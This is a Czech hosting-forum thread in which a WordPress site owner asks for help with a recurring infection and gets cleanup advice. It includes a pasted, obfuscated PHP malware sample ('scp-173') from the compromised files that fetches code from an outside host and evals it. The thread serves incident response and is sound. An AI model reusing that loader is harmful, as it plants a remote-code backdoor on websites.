Website hacked

0

Dobry den,

cca co 14dni zaznamenavam utok na stranky http://www.hotelr10.cz, jenz vyuzivaji RS WordPress ve verzi 5.5.3 a nemohu prijit na zdroj problemu.

Nemate nahodou v ftp logach blizsi informace o moznem zdroji? (Posledni zname datum utoku je kolem 15.12.2020)

Utok totiz zpusobuje zmenu souboru .htaccess na ftp root urovni, tak i v root adresari wp .htaccess.

Navic se v root wp vytvori nove index soubory a zmeni se obsah wp-comments-post (tady vidim mozny zdroj problemu)

  • baindex.php
  • kindex.php
  • mindex.php
  • wp-comments-post.php

Obsahem pridanych/zmenenych souboru je podobnost obsahu napr.:

<?php $wksh287= „_0ibBdY1+*laVHnwjRF(DITtAyqUv6)o95egzE.J2xGSfQZ8Ck,msL3uWKc4 pXMh-ONr;P/7″;$hjwl996=’JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3NzdG9wLn‘;$hjwl997=’RlY2gvbGYzLnR4dCcpO2N1cmxfc2V0b3B0KCRjaCwgQ1VS‘;$hjwl998=’TE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7JHJlc3VsdCA9IG‘;$hjwl999=’N1cmxfZXhlYygkY2gpO2V2YWwoJz8+Jy4kcmVzdWx0KTs‘;$hjwl995=$hjwl996.$hjwl997.$hjwl998.$hjwl999;function ipga515($ctpg039,$ijat861,$aiql008){return “.$ctpg039.“.$ijat861.“.$aiql008.“;}$qvun359 = ipga515($wksh287{58},$wksh287{11}.$wksh287{10},$wksh287{10});$obzp764 = ipga515($wksh287{0}.$wksh287{55},$wksh287{52}.$wksh287{34},“);$hagy470 = ipga515($wksh287{68},$wksh287{0},$wksh287{44});$gnss397 = ipga515($wksh287{55},“,$wksh287{14});$nhyx355 = ipga515($wksh287{58},$wksh287{0},$wksh287{11}.$wksh287{68});$kyyy104 = ipga515($wksh287{68},$wksh287{11},$wksh287{25});$zbgd825 =ipga515(ipga515($qvun359,“,$obzp764),ipga515($hagy470,$gnss397,“),ipga515($nhyx355,“,$kyyy104));$quui045 = ipga515($wksh287{58},$wksh287{68},$wksh287{34});$rfew403 = ipga515($wksh287{11},$wksh287{23},“);$ltvz098 = ipga515($wksh287{34},“,$wksh287{0});$ixkx187 = ipga515($wksh287{44},$wksh287{55},$wksh287{14});$stdj090 = ipga515($wksh287{58},$wksh287{23},“);$ooay198 = ipga515($wksh287{2},$wksh287{31},“);$idke254 = ipga515(“,$wksh287{14},“);$fsgm154 = ipga515( ipga515($quui045,$rfew403,$ltvz098), ipga515($ixkx187,“,$stdj090), ipga515($ooay198,“,$idke254));$kgmp776 = ipga515($wksh287{34},“,$wksh287{28});$bcjy305= ipga515($wksh287{11},$wksh287{10},$wksh287{19});$layf110 = ipga515(“,$wksh287{3},$wksh287{11});$tvqz353 = ipga515($wksh287{52},$wksh287{34},$wksh287{29});$kqez305 = ipga515($wksh287{59},$wksh287{0},$wksh287{5});$eznw875 = ipga515($wksh287{34},$wksh287{58},$wksh287{31});$kkfn264 = ipga515($wksh287{5},$wksh287{34},$wksh287{19});$tieg251 = ipga515(ipga515($kgmp776,$bcjy305,“),ipga515(“,“,$layf110),ipga515($tvqz353,$kqez305.$eznw875,$kkfn264)).'“‚.$hjwl995.'“‚.ipga515($wksh287{30}.$wksh287{30},“,$wksh287{69});$zbgd825($fsgm154,array(“,‘}‘.$tieg251.’//‘));//scp-173?>

WP root soubory maji opravneni 644

Adresare dle doporuceni „https://wordpress.org/support/article/changing-file-permissions/“

root .htaccess (www/.htaccess) ma opravneni 444 a presto je po utoku prepsan.

Preventivne jsem na vsech strankach zakazal vkladat komentare, nainstaloval a nakonfiguroval pluginy „All In One WP Security„, „Limit Login Attempts Reloaded„.

Nepomohla ani reinstalace WP.

Nemate nekdo s podobnym typem utoku zkusenosti, pripadne mi muzete poslat na email logy webu z 15.12 +- den k prozkoumani.

Dekuji.

Role: Zákazník
Otázka je uzamčena pro nové odpovědi.
Vybral nejlepší odpověď
0

Dobrý den, problém se dá vyřešit tak, že si uděláte komplet zálohu a následně vše smažete z FTP a MySQL (komplet všechny weby), kompletně projedete všechny soubory jak z FTP tak z MySQL, otestujete soubory na přítomnost malware, změníte všechny přihlašovací údaje jak na FTP tak do MySQL. Pokud někdo napadl web č.1 tak se dostane i na web č.2 (Multihosting). Po odstranění všech škodlivých kódů ze souborů můžete zpět nahrát postupně na FTP a MySQL. Pokud si nevíte rady, kontaktujte nějakého WordPress specialistu (mohu pomoci i já). Vše se dá udělat, je to ale časově náročné.

Role: Zákazník+ Web: https://wpstudio.online/ Vizitka: Jsem freelancer „webmaster“, který tvoří a spravuje weby. Od roku 2008 se věnuji WordPressu.
Vybral nejlepší odpověď
0

DD,

diky za rychlou odpoved.

Presne tomuhle se chci vyhnout a proto jsem spise patral po identifikaci malwaru a zpusobu jak mu zabranit ve spusteni.

Po dekodovani infikovanych souboru a analyzy kodu jsem prisel na zpusob jak malwaru zabranit v opetovnemu spusteni. Ted ukaze jen cas, zda to pomohlo.

Nicmene voditkem mimo jine byla i identifikace malwaru „scp-173“ v kodu, coz me docela pobavilo.

Jinak podobnym problemem se zabyvaji napr. i zde

https://lukeleal.com/research/posts/scp-173-malware/

bohuzel ale bez vysledku, jen s moznosti pomoci vycisteni webu od malwaru, coz neni nic sloziteho jen pouze otravneho, nebot se malware opakuje cca ve 14dennich cyklech (alespon u me).

Pokud nekdo narazi na stejnou prasarnu, ktera mu otravuje zivot at se ozve.

Pokud me reseni bude dostacujici, rad jej predam dal.

Diky a preji pohodovy Novy rok bez viru 🙂 a malwaru.

Role: Zákazník
Změnil status na publikováno

Kategorie